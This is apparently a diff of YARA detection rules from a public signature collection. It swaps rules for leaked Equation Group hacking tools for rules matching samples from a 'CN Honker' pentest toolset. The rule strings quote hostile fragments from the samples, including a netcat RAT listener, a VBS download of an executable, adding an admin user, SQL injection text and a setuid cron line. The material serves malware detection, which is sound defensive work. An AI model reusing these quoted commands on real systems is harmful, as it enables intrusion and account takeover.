-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L241-L256"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L845-L860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e88e14e0d9c8e8f5ccca3bea78b875bf75fbf0dd54badc339237ca94f0d6373"
-		score = 75
-		quality = 85
+		hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
+		logic_hash = "3be059627c39e262e7621fce637df21ddcabef91753192cec356f2f8cd58c1a3"
+		score = 70
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
 
 	strings:
-		$x2 = "Use this on target to get your RAT:" fullword ascii
-		$x3 = "$ratremotename && " fullword ascii
-		$x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
+		$s3 = ".exe <ip> [(path]" fullword ascii
+		$s4 = "LogCleaner v" ascii
 
 	condition:
-		( filesize < 70KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Telex : FILE
+rule SIGNATURE_BASE_CN_Honker_Shell_Brute_Tool : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
+		description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23571734-869d-5d68-9339-d82f168c2e47"
-		date = "2017-04-08"
+		id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L258-L274"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L862-L877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9661bc43831307cb04883cfe8e54ebb2fe72bf3d7731b2b483cd19c40a5aeaa9"
-		score = 75
+		hash = "f6903a15453698c35dce841e4d09c542f9480f01"
+		logic_hash = "723fd18e59c0017b67a035ec7c685169c517d673c2bbc8fe93071b8dbd1e606a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
 
 	strings:
-		$x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
-		$x2 = "target is not vulnerable. exiting" fullword ascii
-		$s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
-		$s4 = "Timeout waiting for daemon to die.  Exploit probably failed." fullword ascii
+		$s0 = "http://24hack.com/xyadmin.asp" fullword ascii
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Calserver : FILE
+rule SIGNATURE_BASE_CN_Honker_Hxdef100 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
+		description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "abe935ee-8579-54f0-b6d3-172d6e2c0482"
-		date = "2017-04-08"
+		id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L276-L291"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L879-L895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85080074058703a696ac7f978abd8f4d5234f6553c19736fb52375421c4af42b"
-		score = 75
+		hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
+		logic_hash = "49f15482104297f0c57713712a7add49d58007afeefd11151dc5749b755860ba"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
 
 	strings:
-		$x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
-		$x2 = "Writing your %s to target." fullword ascii
-		$x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
+		$s6 = "BACKDOORSHELL" fullword ascii
+		$s15 = "%tmpdir%" fullword ascii
+		$s16 = "%cmddir%" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Porkclient : FILE
+rule SIGNATURE_BASE_CN_Honker_Arp_EMP_V1_0 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
+		description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b34d5f9-bc76-5cc7-92f7-32c2b7ef7bcf"
-		date = "2017-04-08"
+		id = "03782e94-4fac-529f-b235-19cdb124d53b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L293-L308"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L897-L911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4de13f1cac8698fc86e44d29143877924aec4e6712415ee6b35810afed8072d6"
-		score = 75
+		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
+		logic_hash = "457035b1685ac7f1bdccaab0b64bb1ad3ca1bf5e0747222347ced2a11b9b9504"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
 
 	strings:
-		$s1 = "-c COMMAND: shell command string" fullword ascii
-		$s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
-		$s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
+		$s0 = "Arp EMP v1.0.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Electricslide : FILE
+rule SIGNATURE_BASE_CN_Honker_Getwebshell : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
+		description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b1e5293-806a-58e6-b865-66025c8d8c32"
-		date = "2017-04-08"
+		id = "919883f4-af66-5d07-ad41-8cba3e049396"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L310-L326"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L913-L930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0803b61afc592d4fba523dc54d8f856a557b916a9f6e256efccd50178e8e024c"
-		score = 75
-		quality = 85
+		hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
+		logic_hash = "5d6638596607884950e702144416eb6fd3b009c88e4af5f81a50f346d7491c95"
+		score = 70
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
 
 	strings:
-		$x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
-		$x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
-		$x3 = "Usage: eslide   [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
-		$x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
+		$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii
+		$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide
+		$s14 = "net user admin$ hack /add" fullword wide
+		$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Libxmexploit2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cracker_SHELL : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
+		description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "30e94123-acc9-5185-9f5b-1f956c4cf3d1"
-		date = "2017-04-08"
+		id = "2249a058-7469-5054-9c51-cb20ef8197ca"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L328-L343"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L932-L949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7bd88d15cca38e91c65e8373194e35ab9492a80eb27b22ad4000e192f2d9b886"
-		score = 75
+		hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
+		logic_hash = "03da662e8d5dfbae524c4949d90e143714e6c4783e02600e059172e8b09ebc57"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
 
 	strings:
-		$s1 = "Usage: ./exp command display_to_return_to" fullword ascii
-		$s2 = "sizeof shellcode = %d" fullword ascii
-		$s3 = "Execve failed!" fullword ascii
+		$s1 = "http://127.0.0.1/error1.asp" fullword ascii
+		$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide
+		$s3 = "\\SHELL" wide
+		$s4 = "WebBrowser1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Wrap_Telnet : FILE
+rule SIGNATURE_BASE_CN_Honker_MSTSC_Can_Direct_Copy : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
+		description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "158e6ebc-6b43-5e94-9052-31408d848875"
-		date = "2017-04-08"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L345-L360"
+		id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L951-L968"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa7fda8b95b697bb0541642677579f9db9df379048421481cdb66068032bf681"
-		score = 75
+		hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
+		logic_hash = "5437abd979a8df5ee3f8508f7a5fff85714b5d8a22ab1760fe1e7a8168a8c255"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
 
 	strings:
-		$s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
-		$s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
-		$s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
+		$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
+		$s2 = "Clear Password" fullword wide
+		$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 4KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Elgingamble
+rule SIGNATURE_BASE_CN_Honker_Lcx_Lcx : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
+		description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc8a63a1-9deb-5051-a02d-ed26fd1cae95"
-		date = "2017-04-08"
+		id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L362-L378"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L970-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e561794d969b6198f71115087db8cc89043f2079252eef22458450e16596b0eb"
-		score = 75
+		hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
+		logic_hash = "6e81cac14baa9f0ae35eb26f30291cba6f7ef1864f8970b97a3e6e7205d10eb9"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
 
 	strings:
-		$x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
-		$x2 = "[-] kernel not vulnerable" fullword ascii
-		$x3 = "[-] failed to spawn shell: %s" fullword ascii
-		$x4 = "-s shell           Use shell instead of %s" fullword ascii
+		$s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s2 = "=========== Code by lion & bkbll" ascii
+		$s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
+		$s4 = "-tran   <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cmsd : FILE
+rule SIGNATURE_BASE_CN_Honker_Postgresql : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
+		description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9cdd3562-fed4-5b79-b056-049279404eeb"
-		date = "2017-04-08"
+		id = "ae90d03c-ef67-5ece-81ae-86947196a81c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L380-L397"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L990-L1005"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2b9c7ef750c2e45df7839395db51c93204bc9855f5de05bd59c50bb6a964bc8b"
-		score = 75
+		hash = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
+		logic_hash = "f6921e7a7c88d70c77fc30dc273aac3679a3c0ab44d4d4706d7a405f16cff6a1"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
 
 	strings:
-		$x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
-		$x2 = "error: not vulnerable" fullword ascii
-		$s1 = "port=%d connected! " fullword ascii
-		$s2 = "xxx.XXXXXX" fullword ascii
+		$s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
+		$s2 = "PostgreSQL_inject" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of ( $x* ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ebbshave : FILE
+rule SIGNATURE_BASE_CN_Honker_Webrobot : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
+		description = "Sample from CN Honker Pentest Toolset - file WebRobot.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d4c14e2-afb1-57ce-91df-cb024258250e"
-		date = "2017-04-08"
+		id = "8b6350b6-17ea-5f44-a42a-875d55bb2de8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L399-L415"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1007-L1023"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a1a5ddefc646dc55161eb9b2a1b0e4176df7e99660db48b245af3ef9ab0871c"
-		score = 75
+		hash = "af054994c911b4301490344fca4bb19a9f394a8f"
+		logic_hash = "7d7fc9fb9156aa20993dcb809f4e1d3d357f6826dcac7e628dbe6e0f81e5a61a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
 
 	strings:
-		$s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
-		$s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
-		$s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
-		$s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
+		$s1 = "%d-%02d-%02d %02d^%02d^%02d ScanReprot.htm" fullword ascii
+		$s2 = "\\log\\ProgramDataFile.dat" ascii
+		$s3 = "\\data\\FilterKeyword.txt" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Eggbasket : FILE
+rule SIGNATURE_BASE_CN_Honker_Baidu_Extractor_Ver1_0 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
+		description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3fb1388a-e6b8-5c7a-ad23-ddbfc9d33d56"
-		date = "2017-04-08"
+		id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L417-L432"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1025-L1042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4800d5c820a18d3483dc5c055c0e2f5374ce3b160ecb4d940a00ec4a90ca50d"
-		score = 75
+		hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
+		logic_hash = "cba7357ab3cb840b3b115abe00e1a3a712feb036cae816c8ded10d73029efe2b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
 
 	strings:
-		$x1 = "# Building Shellcode into exploit." fullword ascii
-		$x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" fullword ascii
-		$x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
+		$s3 = "\\Users\\Admin" wide
+		$s11 = "soso.com" fullword wide
+		$s12 = "baidu.com" fullword wide
+		$s19 = "cmd /c ping " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Jparsescan : FILE
+rule SIGNATURE_BASE_CN_Honker_FTP_Scanning : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
+		description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6b6a884e-0bbc-54f5-bb6c-00e15ca95250"
-		date = "2017-04-08"
+		id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L434-L448"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1044-L1061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d86b6757abb5ad1902e91f100e6a6bea52e6e14684d184b6b8138270484275f4"
-		score = 75
+		hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
+		logic_hash = "5f1c312dc9fa80c120699bacd17d5e4c147ab96f90c619a8c39ec27646a1307f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
 
 	strings:
-		$s1 = "Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
-		$s2 = "$gotsunos = ($line =~ /program version netid     address             service         owner/ );" fullword ascii
+		$s1 = "CNotSupportedE" fullword ascii
+		$s2 = "nINet.dll" fullword ascii
+		$s9 = "?=MODULE" fullword ascii
+		$s13 = "MSIE 6*" fullword ascii
 
 	condition:
-		( filesize < 40KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Sambal : FILE
+rule SIGNATURE_BASE_CN_Honker_Dirdown_Dirdown : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
+		description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b02b442c-3e24-55f8-aa5c-926c3a3a75b4"
-		date = "2017-04-08"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L450-L467"
+		id = "80f98131-79bf-580d-87ad-a54a3f14b301"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1063-L1080"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6066332b16996a9d8635d3752f46c6529cfc2c94d3d6f0c9791f2068c982bf3e"
-		score = 75
+		hash = "7b8d51c72841532dded5fec7e7b0005855b8a051"
+		logic_hash = "5e8349096b7d07757c3779e13fba87f770a5ef090bc7efe36fd151c7c180edad"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
 
 	strings:
-		$s1 = "+ Bruteforce mode." fullword ascii
-		$s3 = "+ Host is not running samba!" fullword ascii
-		$s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
-		$s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
-		$s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
+		$s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii
+		$s1 = "Decompress.exe" fullword wide
+		$s5 = "Get8Bytes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Pclean_V2_1_1_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Xiaokui_Conversion_Tool : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
+		description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b31af01-8c30-513a-a615-82dcb940e06d"
-		date = "2017-04-08"
+		id = "26e30df6-b1d9-5d82-b368-a4a904939aa3"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L469-L483"
+		reference = "Disclosed CN Honker Pentest Toolset"
